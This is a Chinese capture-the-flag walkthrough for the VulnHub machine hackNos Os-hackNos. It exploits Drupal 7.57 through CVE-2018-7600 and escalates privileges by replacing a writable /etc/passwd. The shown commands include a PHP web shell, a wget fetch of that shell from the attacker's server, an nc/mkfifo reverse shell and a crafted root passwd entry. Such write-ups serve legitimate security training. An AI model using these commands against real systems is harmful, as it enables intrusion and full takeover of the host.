0x000 靶场描述


难度:简单到中级
标志 : 2 标记第一个用户和第二个根
学习:利用|网络应用程序|枚举|权限提升
网站 : www.hackNos.com
邮件 :contact@hackNos.com


0x001 靶场下载


https://www.vulnhub.com/entry/hacknos-os-hacknos,401/


0x002 信息收集


探测存活主机

netdiscover -r 192.168.43.0/24

扫描存活主机

端口扫描

nmap -sS -sV -A -p 1-65535 192.168.43.55

端口扫描

发现开放了 22 和 80 端口,访问80端口,发现是一个ubuntu的默认静态页面,尝试访问robots.txt文件未果。。。

目录扫描

dirsearch -u http://192.168.43.55

发现 http://192.168.43.55/drupal/ 页面,尝试弱口令登陆,失败;继续进行目录扫描

image

Drupal:是开源CMS之一,Drupal是CMS内容管理系统

dirsearch -u http://192.168.43.55/drupal/

目录扫描

逐个访问进行查看,在 http://192.168.43.55/drupal/CHANGELOG.txt 页面发现了当前系统版本是7.57,搜索一下关于这个版本的漏洞,发现存在远程命令执行漏洞。

exp下载地址:https://github.com/pimps/CVE-2018-7600


0x003 利用CVE-2018-7600漏洞getshell


写一个一句话木马cmd.php

<?php system($_POST[cmd]);?>

kali开启http服务

python -m http.server 80

使用exp将木马文件远程下载到靶机

python drupa7-CVE-2018-7600.py http://192.168.43.55/drupal/ -c "wget http://192.168.43.253/cmd.php"

命令执行

然后burpsuite抓取cmd.php的包,改为POST

使用nc命令反弹一个shell

这里为什么要反弹shell,而不直接用蚁剑连接的原因是:这里靶场对终端进行了限制,用蚁剑或者msf后面对提权操作有影响

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.55 8888 >/tmp/f

通过URL编码将/、;、> 编码为如下格式,否则会失败

rm+%2ftmp%2ff%3bmkfifo+%2ftmp%2ff%3bcat+%2ftmp%2ff%7c%2fbin%2fsh+-i+2%3e%261%7cnc+192.168.43.253+8888+%3e%2ftmp%2ff

POST提交

kali设置监听

nc -lvnp 8888

成功获取到shell,使用如下命令切换至交互模式

python3 -c 'import pty;pty.spawn("/bin/bash")'

查看当前权限,发现是www-data


0x004 权限提升


查看网站根目录,发现 alexander.txt 文件,查看文件内容,发现是一些密文,使用 base64解密后,发现还有一层加密,使用 https://www.splitbrain.org/services/ook 成功解密,发现是账号密码。

base64解密
image

前面扫描到了22端口,现在又得到了账号和密码,感觉起飞了,然后ssh远程登陆,提示拒绝登陆;此路不通,重新找提权点。

尝试使用suid权限提权

find / -perm -u=s -type f 2>/dev/null

发现 /etc/passwd 具有root权限,尝试替换passwd文件

kali制作passwd文件

perl -le 'print crypt("123456","addedsalt")'

test:adrla7IBSfTZQ:0:0:root:/root:/bin/bash 添加到 /etc/passwd 文件中

然后使用wget命令远程下载替换

wget http://192.168.43.253/passwd -O /etc/passwd

查看passwd文件,发现替换成功

image

su test

提权成功


0x005 查找flag


cat /home/james/user.txt

cat /root/root.txt

flag

原文地址:http://www.cnblogs.com/Cx330Lm/p/16901068.html

1. 本站所有资源来源于用户上传和网络,如有侵权请邮件联系站长! 2. 分享目的仅供大家学习和交流,请务用于商业用途! 3. 如果你也有好源码或者教程,可以到用户中心发布,分享有积分奖励和额外收入! 4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务请大家谅解! 5. 如有链接无法下载、失效或广告,请联系管理员处理! 6. 本站资源售价只是赞助,收取费用仅维持本站的日常运营所需! 7. 如遇到加密压缩包,默认解压密码为"gltf",如遇到无法解压的请联系管理员! 8. 因为资源和程序源码均为可复制品,所以不支持任何理由的退款兑现,请斟酌后支付下载 声明:如果标题没有注明"已测试"或者"测试可用"等字样的资源源码均未经过站长测试.特别注意没有标注的源码不保证任何可用性